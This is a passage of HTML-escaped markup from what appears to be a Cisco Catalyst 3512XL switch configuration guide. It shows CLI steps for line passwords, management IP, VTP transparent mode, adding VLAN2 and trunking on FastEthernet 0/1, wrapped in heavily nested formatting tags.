"&gt;3512xl(config-line)#&lt;b&gt;login&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;3512xl(config-line)#&lt;b&gt;password mysecret&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;3512xl(config-line)#&lt;b&gt;exit&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;3512xl(config)#&lt;b&gt;no logging console&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;3512xl(config)#^Z&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;!-- Set the IP address and default gateway for VLAN1 for management purposes.&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;3512xl#configure terminal&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;Enter configuration commands, one per line. End with CNTL/Z.&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;3512xl(config)#&lt;b&gt;int vlan 1&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;3512xl(config-if)#&lt;b&gt;ip address 10.10.10.2 255.255.255.0&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;3512xl(config-if)#&lt;b&gt;exit&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;3512xl(config)#&lt;b&gt;ip default-gateway 10.10.10.1&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;3512xl(config)#&lt;b&gt;end&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;!-- Set the VTP Mode.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;!-- In our example, we have set the mode to be transparent.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;!-- Depending on your network, set the VTP Mode accordingly.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;!-- For details on VTP,&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;!-- refer to&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;!-- &lt;a href="http://www.cisco.com/en/US/docs/switches/lan/catalyst2900xl_3500xl/release12.0_5_xu/scg/kivlan.html" onclick="s_objectID=&amp;quot;http://www.cisco.com/en/US/docs/switches/lan/catalyst2900xl_3500xl/release12.0_5_xu/scg/kivlan.ht_1&amp;quot;;return this.s_oc?this.s_oc(e):true" style="color: rgb(0, 51, 153); "&gt;Creating and Maintaining VLANs on Catalyst 2900XL and 3500XL Switches&lt;/a&gt;.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;3512xl#vlan database&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;3512xl(vlan)#vtp transparent&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;Setting device to VTP TRANSPARENT mode.&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;!-- Adding VLAN2. VLAN1 already exists by default.&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;3512xl(vlan)#&lt;b&gt;vlan 2&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;VLAN 2 added:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;Name: VLAN0002&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;3512xl(vlan)#&lt;b&gt;exit&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;APPLY completed.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;Exiting....&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;!-- Enable trunking on the interface fastEthernet 0/1.&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;3512xl#&lt;b&gt;configure terminal&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;Enter configuration commands, one per line. End with CNTL/Z.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;3512xl(config)#&lt;b&gt;int fastEthernet 0/1&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;3512xl(config-if)#&lt;b&gt;switchport mode trunk&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;!-- Enter the trunking encapsulation as either isl&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;3512xl(config-if)#&lt;b&gt;switchport trunk encapsulation isl&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;!-- or as dot1q:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;3512xl(config-if)#switchport trunk encapsulation dot1q&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;!-- In case of 2940/2950 series switches, none of the above two commands are used,&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;!-- 2940/2950 series switches only support 802.1q encapsulation which is configured automatically,&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;!-- when trunking is enabled on the interface by using switchport mode trunk command.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;!-- In case of dot1q, you need to make sure that&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;!-- the native VLAN matches across the link.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;!-- On 3512XL, by default, the native VLAN is 1.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;!-- Depending on your network needs, you may change&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;!-- the native VLAN to be other than VLAN1,&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;!-- but it is very important that you change the native VLAN&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 